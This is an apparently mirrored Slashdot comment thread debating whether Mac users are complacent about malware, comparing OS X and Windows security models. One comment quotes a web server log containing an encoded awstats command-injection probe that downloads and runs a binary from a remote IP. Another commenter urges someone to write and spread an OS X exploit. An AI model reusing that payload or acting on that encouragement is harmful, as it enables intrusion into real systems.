Slashdot Mirror
Mac users 'too smug' Over Security?
wild_berry writes "Bill Thompson, one of the BBC's technology commentators and presenter of Go Digital on the BBC World Service, expresses his concerns that Mac users assume their safety in the face of trojans, worms, keyloggers and other malware. As a Mac user he is most concerned about the lack of herd immunity that is needed to stop a few infections becoming an epidemic, fully explained in his column week for the BBC technology site. Is he right, and what actual products exist for OS X that would protect against infections?"
This article was dead on.
My first ever encounter with this mentality was in high school when my music theory instructor told us that she loved her Mac and when I tried to argue with her about a number of things, she'd repeatedly reply with "No Mac has ever been hacked or had a virus on it."
Now, at the time, I was a young nooblet and probably should have let it slide but instead I snuck into her office and opened up her Macintosh's word editing software with the intent of some lil' bastardry. I found the option to replace a mistyped word with another that the user entered. After that, whenever she typed the word "the", it was replaced with "WARNING! VIRUS DETECTED! PULL PLUG FROM OUTLET AS SOON AS POSSIBLE!" Unfortunately, her son knew enough about computer to fix it so my fun didn't last very long (only one or two lunges at the wall).
Back to the issue--I think it is a grave mistake for anyone to ever feel 100% invulnerable when it comes to computers that are connected to the internet in anyway. I would diagnose this as a standard case of a false sense of security. This is something that has plagued many people throughout history and often led to their downfalls.
What message am I trying to get across to Mac users? First, realize you're not invulnerable. Second, just browse around and look at what's out there for you to use as anti-virus and virus blocking tools. And if you don't want to, read some horror stories, perhaps that will motivate you to become aware of possible worms in your Apple.
My work here is dung.
It isn't so much that there aren't as many security holes in OSX and Linux (as well as other OS's), but that there aren't the hoardes of people gunning to find them like there are in Microsoft (aka the evil empire) products.
Mac users are too smug about... everything ;]
The guy is right, and security by obscurity doesn't really work for long. I suppose that the security of Macs rests in the continued success and growth of Windows.
I have a Mac and only have the firewall turned on. I suppose I'm off the bell curve since the Mac is for entertainment only and I rarely browse and never use email with it.
So, is there a profile of a Mac virus writer???
-a
Not another one of these articles.
If you want to talk about any audience that's too smug, talk about Linux. Linux is on more important machines, and yet everyone talks about how safe and secure it is, even though in some cases it's just not true at all. Yes, Open Source code is generally more secure, but the major parts that need to be secured in OS X are Open Source.
As far as I'm concerned, both Linux and OS X are going to be one hell of a lot safer than Windows for a long time running, and so I can rest and relax in my relative security thanks to Microsoft's inferior security practices.
"Victory means exit strategy, and it's important for the President to explain to us what the exit strategy is." G.W.Bush
The retailers who make this claim to those who may not know better.
A local Mac shop practically advertises that a Mac is totally secure and immune to viruses and spyware.
Every time I see one of their commercials I shake my head at the persons obvious lack of understanding of the issues at hand. It's one thing for a Mac fan to say there are secure due to their delusion... it's quite another for them to use their delusion as the basis for a sale.
It's just a shame that for them to be proven wrong, a lot of people and their PC's have to get hurt.
Help Brendan pay off his student loans
That's Mac OS X.
There's no substituting an OS that doesn't let the average user have administrator rights all the time.
The windows users state that they don't need to run as administrator, but then ask them what hurdles they have to go through to make their software "just work".
Help! I'm a slashdot refugee.
It will be a GOOD indication when malware writers start attempting to target Apple or *NIX. It will either mean that MS produsts no longer the dominate player or it will mean that MS products are no longer a major security problem.
IANA Mac user, but, isn't there Word (or Microsoft Office) for Mac? What is difference between Word on Windows and Mac that prevents those notorious macro virus?
hilarious
I've been using Linux for nearly a year with no Windows on my PC. After that, I had to use Windows (developed .NET apps) and on the first day got 3 completely different viruses and managed to get my system completely screwed up. Before that I had a huge experience in Windows and never had any real problems with that kind of stuff. However it appears that I've completely lost awareness of the possible dangers of running every app without checking first.
So it appears that Linux and probably Mac users are less aware of malware and do some really careless things because the probability of getting a virus is extremely low.
there are numerous anti virus programs out there for the Mac, but what virus are they scanning for? There are no known viruses for OS X, so how can they update the virus definitions if they have nothing to base it on? They've seen a vulnerability here and there, but nothing has been exploited yet. So it's like the chicken and the egg. you need an AV program to protect yourself from viruses, but you need a virus for the program to detect.
The day i see a virus on OS X is the day I buy an AV program.
How about a router with a firewall and the slightest bit of common sense?
It works here even with Windows XP.
If tyranny and oppression come to this land, it will be in the guise of fighting a foreign enemy. - James Madison
Bill Thompson is right, but there is a much, much larger problem that's out there: cell phones. Cell phones are always connected to a large network. There are billions of them, And very few cell phones run any kind of anti-viral or anti-trojan software.
Although Bill may be writing to ride on the coat tail's of Apple's recent success, the Macintosh can get infected by a virus or a trojan program. In fact, some of the earliest computer viruses in the wild were found on the Mac. The Mac virus problem isn't as large as the Windows virus problem, but that's because there are many more Windows machines intermingling out there.
Any networked device, from routers to mainframes, from Bluetooth devices to cell phones to the XBox 360, may be vulerable to malware. All need robust security.
My stock response: "The truth is, viruses just aren't a huge threat on the Mac right now. However, my religion precludes me from advising you to not buy anti-virus software."
It's not like you don't have options though. You can get anti-virus software from:
Symantec
Sophos
Intego
McAfee (Virex, included with a
And, of course, there's always Clam AV, along with the ClamXav front end for OS X.
...but architectural considerations need to be considered, too. There's no legacy baggage code from 1990 (a la WMF) to be worked around. Sure, we're smug, but that's because we live in today and not some theoretical tomorrow.
That being said, my Macs have Little Snitch installed. For those not lucky enough to be using a Mac, it's like Zone Alarm.
Is he right, and what actual products exist for OS X that would protect against infections?
Today, wild_berry was the billionth story submitter to place an annoying question at the end of his submission. Despite the pleas of nearly a million Slashdot users, wild_berry took part in the timeless tradition of Kindergarten Teachers and Coffee Talkers everywhere, and gave us a topic to discuss amongst ourselves.
What about YOU, what is your opinion of annoying questions at the end of postings? What do YOU think about them? Do YOU have any solutions to the problem?
I don't know who the guy is, but the article is completely useless. There are absolutely no hard facts in there. Please point us to ONE SINGLE virus, keylogger, adware, or any type of malware at all before making ridiculous claims like the old and completely bogus "it's just because of low market share". It's just not true. I haven't come across anything dodgy so far and I've _actively_ looked for it. Nothing except some shell-script with a highly hypothetical threat. Also, keep in mind that OS X users tend to get a large percentage of their software from centralized sources like apple.com and VersionTracker, which wouldn't post or quickly pull any infected software. IF there was any kind of outbreak, it would be all over the Mac-web within an hour at the maximum.
I will be adding some extra security to the system. But the average user cannot do what I will be doing.
Why don't you enlighten us oh gifted one?
- Sighuh?
Looking at /var/log/httpd/access_log I typically find lines like these:
/NULL.IDA?CC... /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bc hmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;ech o| HTTP/1.1" 404 293
61.185.142.22 - - [15/Jan/2006:20:41:12 +0800] "GET
210.0.196.236 - - [16/Jan/2006:19:14:34 +0800] "GET
Why would I bother about this? There never is and never was an attempt at hooking up to my machine. Not a single virus, worm, trojan horse or macro virus in fifteen years of time.
There was a time when I downloaded the latest and the greatest in antivirus, but those apps were never of any use. They just consume valuable cycles and memory. I was just fooled by commercial forces to believe that I too could be hurt.
IF there is a virus or similar attacking Mac OS X, it will be known in no-time by the entire community, because there are a few outlets that almost all Mac users tend to for information. IF, and when, that happens, I will worry a little bit. But until then I will just let you folks use your Windoze crap machines loaded with warring apps to combat the attacks on your machines.
Do you wear a bicycle helmet? You are much more likely to be killed in a bicycle accident than your Mac is likely to be hit by a malicious attack. So, do you wear a bicycle helmet!?
If you are using Mac vs. Windows you are definatly safer. Even if you are using a windows system with all the greatest and most expensive security tools out there. First you have the OS Level of protection (which the extra windows security tools tend to fix some of), Wich prevents applicatons running as Root or Super User unless it notifies the user and they will need to retype in their password (Which could still be a problem, but at least the user would know what they did and when so they could possibly fix it), and Unlike windows and a lot of Linux Distros. It is out of the box with all outside ports closed.
But you can still put malware on a Mac. Just attach it to an other application and when they install it, it asks for a password and bang your malware has full access. Some of the new features shown at the Last Mac World scare me a little to. Like allowing people to email links when click opens up iPhoto etc... where they could be a flaw in the graphic renderer to cause a buffer overflow and run code.
The second level of protection is just the fact that a lot less people have a Mac then a PC. If you want to cause havic then you taget windows because the windows base is large enough to allow viruses and malware to spread. Apples are more dotted. And sending mac malwarer may not have the numbers to spread.
All in all I would feel safer using a Mac with a Raw connection to the internet. Vs. a Windows PC behind a well maintained network, with all the patches and secuirty tools. Because the chances are the Mac will catch on fire from a faulty fan, then get a security compremize (Without changing the origional out of the box setting)
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
You're not vulnerable if you're not a target. Macs are not targets. And I fix all computers, Windows, Linux, Macs. Mac people are no more or less smug than those other users. Most Windows people don't have a clue about firewalls, virii, trojans, or worms fyi. Computer users are all the same. They just want something that works. BTW I haven't had to remove a virus, trojan, or a worm from a Mac yet. I've done that for Windows machines all the time and make good money doing it. You do the math.
> So again how is it a safer OS if these exploits existed in the first place? Go stick you head in the sand until the great Mac worm hits that erases everyone's OSX drives. Then maybe people will realize that NO Operating System is completely safe. PERIOD.
If you look at the OS X `exploits' (quotes because that's not what they are), most of them are holes in software that doesn't even run by default. Are you using Apache 2 (not 1.3) on your desktop? If so, the security update will prevent a malicious trusted (!) proxy server from crashing one thread of your Apache instance.
If you're using Windows, you need the security update to prevent the web browser from downloading an image that puts a rootkit on your machine.
It's all about severity, and OS X's "holes" just aren't that bad. However, MS consistently manages to provide a multitude of auto-infection routes to virus writers.
My other car is first.
I distinctly remember my first virus way when the computer was still a bit of a novelty and the 200MB disk was considered godly (I distinctly remember my Day saying that we'd never fill it up in our lifetime). When my family got our first Mac Plus, I thought I was in heaven - I could draw using MacDraw and write up reports, but most importantly I could play all sorts of cool games like Dark Castle and Dungeon of Doom. Of course it didn't take me long to figure out that my friends and I could swap games, stretching our very limited allowance. Everything was great, until one day I accidentally infected our computer with one of the nVIR viruses. That was an experience I'll never forget - my dad feared for his computer, I feared for my life. The computer survived, and so did I (barely), but it's safe to say that I've been paranoid about viruses ever since.
There have been HUNDREDS of articles like this over the last few years, especially since Apple moved to OS X. And every time the tone is, that Mac users have no idea how dangerous computing is, and have too much trust in Apple and OS X to be inherently virus/malware/spyware/trojan proof.
The problem for me is, that I see nothing to shake that trust in OS X.
I switched to OS X machines after years of administrating a collection of around 100 PCs in two internet cafes, and 100 PCs running Windows being used by thousands of clueless users entails massive amounts of work and hardship to keep them virus/malware/spyware/trojan free. We had a few Mac machines, and all they ever needed was to have 'software update' run once in a while.
There's no point telling people that they have too much faith in OS X's powers to keep out the hackers and viruses, when there are STILL no viruses for Macs, still no malware apps, still no trojans, still no worms. What can they expect articles like this to make users do? Run anti-virus software everyday? What the hell would it be looking for?
Linux is a damned secure OS, at least as good as MacOS X. Yet, you find Linux sysadmins often talking about relatively paranoid security measures when talking about keeping their systems safe. Linux has a good security culture. (The same could be said for the BSDs.)
The issue, in my eyes, is not whether MacOS users are going to be immediately vulnerable to any virus outbreaks because they're not securing their computers properly - it's whether this whole "I use Macs, therefore, I am impervious" is fostering a culture of bad security practices in the Mac community. A good OS is only half the battle - you need to make sure you have good security practices, too, if you don't want to get owned.
-Erwos
Plausible conjecture should not be misrepresented as proof positive.
A couple of men went camping. They camped at a remote site, new to them, where they didn't really know everyone else who was camping there. After setting up, one of the men put a little, teeny tiny lock on their tent flap door. His friend looked at the flimsy lock and remarked, "That lock is nowhere near good enough to keep out anyone who might want to get into your tent! Why, I bet I could get through that lock in less than a minute.". The first man replied, "The lock doesn't need to be the best lock in the world; it just needs to be better than that guy's" -- and he pointed to the tent next door, without a lock at all.
The point being, surely Mac OS X is not the end-all and be-all of security, but Apple has by all accounts gotten increasingly serious about security as Mac OS X has matured. It's not ever going to be possible to have a 100% perfect level of security, but as long as it's better than that guy's (points to Redmond, WA), in most people's minds it'll be the most secure commercial OS on the market. ~jeff
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look of a Mac users face is to release an exploit in to the wild. Go ahead. What are you waiting for?
If just one person who thinks Macs are just as vulnerable as PCs would just write a worm/trojan/virus, we could end these f*@&!#g trolls and all agree that security is hard. Really, please, someone write an OS X exploit and spread it. Make it benign if you're uncomfortable with writing viruses. Just get something out there.
I'd like to see it just so people will stop using the lame "there are more Windows PCs" arguments. I'm sorry but this whole issue has gotten so blown out of proportion that the first person to show a really bad Mac vulnerability with an exploit would be on every geek blog and quite possible the NYT. You'd be f*@&!#g famous.
I get regular security vulnerability email alerts all the time. Just today there was a long list of potential problems with 10 different flavors of Linux, HP-UX, Cisco, OS/400, Z/OS and of course Windows.
Now the issue is, how bad is that? And the other question is what is the cost - benefit of fixing it?
Many of the vulnerabilities in the alert I alluded have the potential to be serious enough to warrant your attention but this assumes that you already have NOTHING in place to protect yourself, that you've effectively not implemented any security infratrature whatsoever. The probability of this is quite low.
But - and this is the big issue with Windows, your exposures surface out of EVERY SINGLE ordinary everyday common task you employ the machine to do. It would be as if every Cisco vulnerability surfaced specifically and only when it routed packets and only because it routed packets.
Therein lies the difference.
In the Mac world, no one is seriously suggesting that their BSD based OS is defacto immune from problems. What they're arguing convincingly is that those problems when they arise will arise out of non common tasks and obscure problems that typically stem from operating your machines in a very nonstandard way to begin with. For instance the ordinary Mac user could, if they were motivated, run as root all day everyday. But why would they? That's a nonstandard operation mode. Moreover the common problems you do see in the Mac world won't ordinarily occur because of executing common tasks that ordinary users employ their machines to do. You won't see many vulnerabilities exploited the same way that simply using AOLIM or Limewire or reading a rich email or any of the other innumerable problems in Windows stems from.
The rest of your regime is foolish. Virus and anti-spyware software on the Mac is a case of the problem being worse than the cure. Several of the anti-virus software packages for the Mac actually make your machine less secure. You're not just wasting your time and processor cycles, you are actually making yourself more vulnerable.
Use a firewall, backup regularly, and don't open executables from untrusted sources. That's my whole regime. Perhaps Mac users are a little smug, but hey... this article is six years old and we're STILL considerably safer than our Windows counterparts. Perhaps we deserve to be a little smug.
No amount of software can replace common sense, and common sense never let a virus onto somebody's computer (unlike certain anti-virus software).
There's no substituting an OS that doesn't let the average user have administrator rights all the time
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
All that user data that's completely and utterly irreplacable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
The amount of real damage that a virus, worm, or trojan can do is not substantially affected by whether or not it can get administrator privledges. It may be easier to remove, but that's about it. And, frankly, if your average user runs in a lower privledged account then they're likely to get used to typing in the admin password when prompted, without even thinking about it.
And that's what it ultimately boils down to -- the user. Clueless users will get hit by crap all the time regardless of the platform. Clued users will not, again regardless of the platform. I've been using PCs for over 20 years now, most of that time on DOS or Windows (although I've also used OS/2, Linux, FreeBSD, Solaris, and several others) and I've been hit with a virus exactly once -- and that was about 18 years ago. It infected very little too, because I was running a virus scanner that caught it quickly (back in the days when McAfee was free(ish) for personal use). Nor have I ever had to remove spyware, malware, etc. on any of my personal or work systems.
OS X has a rather high percentage of non-technical users, just as Windows does. Do you really think that they're immune to doing stupid things?
I already said this in reply to another post, but I'll say it again: OS X is not "obscure". The core OS is open source software (called Darwin) that is based on decades-old BSD code. Cocoa, OS X's most important API has been around since the NextStep days. The stuff on top of Darwin has so far never been successfully exploited, and there has to be some reason for that.
My dad bought my niece an HP laptop for Christmas. The next day, I was installing some software (Firefox, AdAware) and got a pop up for "cheap mortgages". She was fiddling with it for all of three hours on Christmas day and got spyware.
Yes, I realize that these are anecdotal stories, but they're pretty typical of the experiences most tech people have in their families.
But, as someone posted earlier, if Macs are 5% of the computer market, why aren't 5% of the viruses and spyware on Macs? That would be tens of thousands, not a few dozen.
You have two hands and one brain, so always code twice as much as you think!
I think a user should have the right to expect that he can plug his brand new spiffy computer into the Internet without having it infected with some crap within a matter of minutes. I think a user should have a right to expect that his computer is secure without having to run 5 separate security products on it at all times. I think a user should have a right to expect that he can open an email or web page he hasn't visited before without the fear that his computer might be taken over. I think that if your operating system does not live up to these simple measurements, you have failed as a software company.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I think you would find all three levels of "smug" amongst Mac users, amongst Linux users, and even amongst Windows users, seeing as how we have plenty of issues in the wild that target Microsoft desktops and laptops. OSX is not particularly "good" against malware; it's more like Windows is particularly "bad", and 99% of the Bad Windows is due entirely to Bill's Favorite OS being configured as vulnerable in a default install. This is a problem in the attitude and practice of the OS vendor, not the OS itself.
Were Windows to be more like UNIX, Linux, or OSX in only that one area, we'd all be more secure, and we could all be worrying about more serious vulnerabilities that go beyond attachments, nasty pictures and Active-X agents of doom.
Now, "too smug" about security, I'm not so sure. It definitely depends on who you talk to (and you obviously haven't been talking to any Mac users I've tutored on the subject; they know security is ongoing and requires vigilance on any platform).
Apple themselves are, and always have been, very reluctant to suggest Macs are immune to malware, and even with Windows nearing 100K in virus/worm/trojan instances, they are remarkably silent about what many feel is a significant competitive advantage. OS9 was (and still is) a much more secure OS than OSX; it may well be amongst the most secure ever widely deployed by anyone. Yet, that would be news to a majority of users on any platform, including OS9 users themselves.
Are men "too smug" about Breast Cancer? Certainly they don't "worry" about it, but they too can be victims (not sure about the actual instances, but perhaps 1-10 ratio would be in the ballpark. You could look it up if it's important to you). Yet, it's not on top of their radar, and I don't think you should be insisting that's somehow wrong. There are other things to worry about, plain and simple.
How many copies of Mac AntiVirus software gets sold? By the parent post, it should be none, since the smug would obviously prefer to spend their money on further whitening of their annoyingly bright smiles. Yet, it's widely deployed on home computers (not just corporate boxes) running OSX. I don't know about you, but putting out $50 for what the smug would find to be useless software doesn't jive with the assertion. I also find it hard to believe that Windows users would voluntarily deploy any software at all that cost them money to protect Linux, UNIX or Mac users were the shoe on the other foot.
I wonder if all this smugness is related to former Windows users or to people actually comparing the two platforms while shopping and who chose a different path than they otherwise would have a few years ago? If Linux boxes were available to average consumers (a real problem, still not addressed) would Linux geeks be outnumbered by clueless Linux Lusers, smug about security?
Windows is inherently insecure. Hell, in unpatched machines you can even infect it remotely! Their ancient code, silly way of doing things, etc., make it much more vulnerable to all sorts of attacks. OS X is not Windows, it's not anywhere near Windows, and it has much more in common with FreeBSD than anything else.
Ok, you demonstrate you have a good basic knowledge of OSX, but you also demonstate you have little to no understanding of Windows.
Windows is built on Windows NT, a kernel very much like the BSD interface and kernel that is in OSX; however, being a bit more advanced as it is a non-monolithic client/server kernel technology.
What this means is that WIndows (Win32) and Windows NT, the core under what you see as windows are two very different things.
Windows NT is a true commericial scale OS designed by some very brilliant *nix OS engineers in the early 90s. However it was designed with a bit more extensibility and features than other *nix kernel concepts of the time.
This is why the Windows you see (Win32) is actually a subsystem OS running on top of the Windows NT core.
Security in the Win32 area of the OS is typically where you see viruses and secuirty problems in Windows, not in the NT core underneath.
So to contrast OSX as being 'better' because of its BSD variant kernel is showing a great misunderstanding of the kernel technologies in Windows, as WindowsXP is a Win32 Subsystem running on a NT kernel, a kernel that is as highly regarded in the computing world as any other modern kernel technology, even BSD.
Now if you want to see windows as Win95 or Win98 or WinME, that is a different story, they are completely different Operating Systems and do NOT have the NT kernel or core under them and virtually no security.
Why is having the NT core underneath an important issue?
The NT architecture and kernel were designed with security in mind, more so than a lot of *nix variants at the time in the early 90s. NT has a lot of security that any subsystem running on it MUST adhere to, even the Win32(Windows) subsystem that most people see as Windows.
WindowsXP with SP2 is a fairly secure and safe OS, more so than people that have not used Windows in many years would like to believe. (SP2 is technology derived from the security refocusing at MS that was put into Windows 2003 Server - Since XP on the desktop and Windows Server share the same code base.)
OSX has done some things right, and Apple deserves credit for that. Running users out of the Admin/Root area was done very well (even though System9 didn't even have such a distinction).
Windows Vista (with the NT Core) will also bring the root/admin abstraction to the Windows World. MS should had done this with WindowsXP, but instead choose compatibility for older applications.
MS truly isn't stupid about security, nor is Windows. But Windows has to do something OSX doesn't. It has to support a staggering amount of hardware configurations (without conflicts), and a staggering amount of third party software, and then add in that it is the most targeted Operating System for hackers.
Since Windows 2003 Server and XP SP2, MS hasn't done so bad in the perspective of things, truly...
Our legendary humbleness. :-)
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I'd say Mac users are def. too smug about security, and it's only a matter of time till that smugness is taken advantage of. But for now, it works. You see, what I haven't been able to get is why there aren't any significant virus threats for Macs. Just as there are fanatics for Macs, I've seen people _HATE_ Macs and all that use them with a passion second only to their passion for living. How these people haven't created viruses for Macs is beyond me (Harder to spread since Windows would be a brick wasll if it were a worm, but still worth a try, maybe a bi-OS virus?). It can't be that every good virus maker is a Mac fan. I think OS X has a built in Firewall, but for now, I think I'll be fine not using a virus scanner like much of the rest of the Mac community (I feel like I just admitted my kryptonite....).
In undeveloped countries, the consumer controls the market. In capitalist America, the market controls you.
I've seen this problem on our university's campus more than a half dozen times (oh, the horror!).
-User reads something about "SSH" to access his machine.
-User turns on SSH
-User also has no imagination with password--uses common dictionary spellings
-User is cracked into with dictionary attack
-Security team shuts down port or blocks MAC after a bank calls to report attacks
-User calls helpdesk
-Consultant re-installs MacOS X and smacks the user about the head and shoulders because they had no business enabling SSH
-User has admin privileges stripped
-Problem solved--for now.
So, the biggest "problem" is, indeed, user ignorance. But, out of the box, I'd say Macs are in pretty good shape against attacks and malware given the current lack (and history) of Mac spyware, trojans, or viruses (none that I know of).
Macs are not impervious, but they enjoy 2 major benefits:
1) There aren't enough of them for a worm to spread quickly or effectively (which is what I'd want if I were in the black arts).
2) They don't come with giant holes from the complacent company who wrote the OS--why work when you can pick the low-hanging fruit from MS?
With the new Intel chips, executeables might find new life in the Mac...but we'll see.
I might know what I'm talkin' about, but then again, this is Slashdot...
Why don't you enlighten us oh gifted one?
I imagine he's using Mac user standard precautions; place router inside wall safe, wrapped in tinfoil, and smothered with secret sauce. Nothin' beats that. We've been discussing it on the official Apple Fanboy List and have deemed this to be the best approach.
(Also we use characters like ü, ç, (TM) and © in our passwords which are nearly impossible to type in Windows.)
If Jesus wants me it knows where to find me.
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look of a Mac users face is to release an exploit in to the wild.
a g=zdfd.newsfeed
3 75,39155837,00.htm
I actually don't have to do anything that hasn't already been done...
Here is my 2 minute search for a response to your questions specifically.
Proof of concept exploit:
http://news.zdnet.com/2100-3513_22-5189335.html?t
Exploit, infections from not known:
http://news.zdnet.co.uk/internet/security/0,39020
In Wild exploit, known infections:
http://www.macintouch.com/opener.html
I don't have time to do more research to help your denial, but I would suggest you actually do a bit of research yourself and see that OSX is no more perfect than any other OS. PERIOD.
Apple has quite a few things going for it in regards to security, which is why we've seen no wild viruses yet:
1) Real user accounts with limited system permissions. Makes it harder for viruses to really worm into the system.
2) No services open by default so there's really no good vector for automatic intrusion - whatever service you pick is going to have a low payback.
But really a very important, and often overlooked feature is (3) - a system updater that people do not disable, because it's not very intrusive.
That is what gives Macs a tremendous immunity advantage as a group, because if any attack vectors are found (either through Safari or services or what have you) Apple can have 90% of the Macs on the planet patched within a week (being really conservative there and assuming that 10% of macs either would have update disabled or otherwise are unable to update for some time for some reason). So even a serious spyware problem that entered through Safari (my bet for the first sucessful attack we would see) would be patched before many people would get hit.
In theory Windows Update could do the same for Windows - but in reality a lot of people disable it as it keeps breaking things or is just plain in the way.
So the reason that Macs have no viruses yet is not because the marketshare is too small (point me to any spammer that would just toss aside a few million zomies if they could use 'em), but because like the borg shield any vulnerabilities are constantly shifting and thus not explotable for long enough to make the attempt worthwhile.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
These post are common, I've been reading them on Slashdot, Ars Technica, my newspaper and tech sites around the internet. They usually are initiated by virus vendors trying to be profesisonnal (not sell their product noooo...) and warn us of the potential dangers.
I'm actually pretty sure there are more articles about the fact that MacOSX can be prone to malware than there is malware on the Mac. As a mather of fact, no malware on the Mac yet (MacOSX, classic MacOS had a few prior to os8).
None
Zero
Zilch
There was this "proof of concept" once... you had to download a mp3, which in fact was an executable archive, you had to double-click it in the finder, which almost no one does (drag and drop on app in dock usually), then it would execute (which no mp3 does, you have to be a moron not to be suspicious at that point) and then your MacOS was asking for permission to run the process (cause it was targetting a system component), then at this point, you have to be VERY stupid to write your password in the window and click yes. That was what is considered "proof of concept" on the mac...
Name one.
C'mon. You just spent a lot of time telling us that there are a lot of viruses out there for OS X and that we should just research it. Well, I'm sure you've researched it, so enlighten us, please. Name one.
Oh, I know about the "opener" trojan. A shell script that never went anywhere. BTW here is a much more destructive "Mac OS X trojan" called "runme.sh" that also affects Linux and Unix! Oh my. Here it is, read with caution:
The only viruses I've seen on macs are word macro viruses - namely Claude.ASo, oh wise one, educate me and the rest of use please. I am aware that there are security weaknesses which could be expoited. But so far, none have. I agree, that we have to be vigilant, but for now, you are just talking out of your ass.
"terrorism" and "pedophilia" are the root passwords to the Constitution
There is an anti-spyware product for the Mac OS world called "MacScan". I interviewed the President and COO of SecureMac, the developers, on the last edition of Radio MacGuys
http://www.macguys.com/
wherever I go, there I am.
When looking at theories stating that if OS X had larger market share than windows we would see many more OS X viruses one might thing this is a reasonable assumption. The problem with thinking in this way is that it uses Windows as it's case example. With windows as the only data set for comparison there is no evidence to support that with similar market share we would see a dramatic increase of viruses on OS X.
/" and I might listen.
You can definitely argue that there might be more ATTEMPTS at writing more viruses/malware/ect due to a percieved increase in the target market size, but the differences between windows and OS X are such that you really can't say that because with X product Y happened, so with A product Y will also happen.
Show me ONE...just ONE OS X VIRUS...not UNIX worm, not 10 year old Office VB script, or somebody just writing a shell script with "sudo rm -rf
Until I see one in the wild everything else is conjecture.
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
.Mac subscription includes backup programs, and automatic syncing of a number of things like email and keychains and application preferences and other user-defined documents to an Apple server, in case the worst happens.
All that user data that's completely and utterly irreplacable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
Actually part of the
But really, what modern viruses actually delete user data? They are far more interested now in capturing user data, or better yet claiming that computer as a zombie. It's simply far more profitable. The idea of viruses actually going after user data is as outmoded as the story submission itself.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
My brother has an older iMac with five user accounts on it, so if one user gets a virus then only 20% of the user data is at immediate risk
The permission system on OS X is quite loose. By default, users can write directly to the Applications directory. That means that malware could easily trojan common programs like iTunes and so on.
So, if a virus somehow got onto the average Mac, I don't see the user account system being any more than trivial protection.
Whenever I hear the word 'Innovation', I reach for my pistol.
Though there is some merit due to the fact that no computer or OS is ever completely safe, the Mac is vastly safer than Windows and it certainly isn't because Mac's are so outrageously rare that no unscrupulous hackers own one and it also isn't because unscrupulous hackers are so noble that their honor prevents them from writing malware for the Mac. If you believe that, you are deluded. (Of course if you are right then it's all the more reason to buy a Mac!)
So why haven't Mac's seen their fair share of malware?
It is because the OS is simply more secure by design. Are there flaws in that design? Of course there are. But I think the reason reason is more non-technical.
Just try to run and administer a Windows box securely. It's extremely hard to do. A knowledgable security person can do it with a great deal of effort -- but the average home consumer sure can't. You'll also rapidly discover that not all, but a substantial quantity of Windows software is written with the assumption that applications are installed by the same users who will be running them or that all users have administrative rights all the time. The Windows developer community has this flawed mentality and the OS paradigm does very little to enforce a more secure model.
Mac OS X, in contrast, has a completely different security and usage paradigm. Use a Mac and you'll quickly discover that the OS assumes that the OS should live in one part of the filesystem, installed apps in another, and users should only modify files that are found in their home directories -- further, no user is an admin. Even administrative users run unprivileged and have to type their password to perform administrative actions. Developers with any experience on a Mac quickly learn this paradigm. There are exceptions and I have found them, but they are uncommon on the Mac whereas they are quite common on Windows.
There are so many technical reasons why the Mac is more secure, but the underlying non-technical reason is because (a) developers and users alike are basically lazy and will follow the path of least resistence and (b) the path of least resistence on Windows is to not bother with security at all whereas the path of least resistence on the Mac is to actually have a more secure installation... the OS & it's tools actually make doing this seem quite natural.
Bottom line: The average non-technical Windows user really cannot maintain a secure machine and Microsoft's OS paradigm does little to encourage secure devopment practices. The average non-technical Mac user actually can maintain a fairly secure machine without really knowing what they're doing... and that's because the OS makes it easy for both the users and the developers to have good security habbits.
Mac user's should be a little paranoid, but the OS is vastly more secure. While we'll probably get a small number of malware problems, it'll never come close to approaching the scale of security problems enjoyed by Windows users.
So it's clearly possible to craft attacks for MacOS-X. But Mac market share is so tiny that few bother. Back before the PowerPC transition, when Apple had more market share, there were more Mac viruses. "Back in the late 1980s, viruses used to be a much bigger problem on Macs than on PCs. We here at F-Secure used to have an antivirus product for Mac but discontinued it after the macro viruses died out".
There have been some gaping holes in MacOS-X browsers that allowed execution of remote code. But nobody bothered to exploit them. Or so it is thought. There's always the possibility of quiet exploits that extract some useful information from the target, ship it somewhere, then clean up and exit.
http://despair.com/pretension.html =)
"Understand you're having a little Jimmy Page trouble."
You call a Mac user arrogant because he doesn't wear a belt, suspenders, and two coils of rope around his middle. But you see, his pants aren't falling down. Yours are. And they keep falling down no matter how many precautions you take. I think you need to have a talk with your tailor.
In other news, oxygen tank expert Bronchito McCougherson chastised non smokers for being too smug thinking they were immune from emphysema and lung cancer.
If the worst problem you can find in Mac OS X is that it allows social engineering attacks, well, that means it's even stronger than I'd give it credit for. Social engineering is not an exploit against the OS, it's an exploit against the user. You can't solve THAT technically, at least not until the Singularity when we can apply service packs on our neumonal implants.
Here's what I want to know. Now, analyzing a multivariable problem is always harder. When we compare Windows and Mac, for instance, the two platforms have (a) vastly different market shares and (b) significantly if not vastly different security models. Which factor accounts for the vastly different level of malware threat? We don't know for sure.
BUT, to all the Windows apologists who are always saying it's not Windows's fault that there is so much malware for it, who are suggesting that it's all the malware writer's fault, who are implying it's unfair to criticize Windows for its popularity, I want to say: are you sure that the difference in security models doesn't account for any of the difference? Why are you (or, rather, why is Microsoft) so reluctant to try any of those "different" security techniques that Macs (and Unix and linux machines) use?
(But I guess I know what they'd say. "No system is 100% secure. There are vulnerabilities in the Mac, Unix, and Linux models, too...")
As a wise man once said, "There is no step function between 'safe' and 'unsafe'."
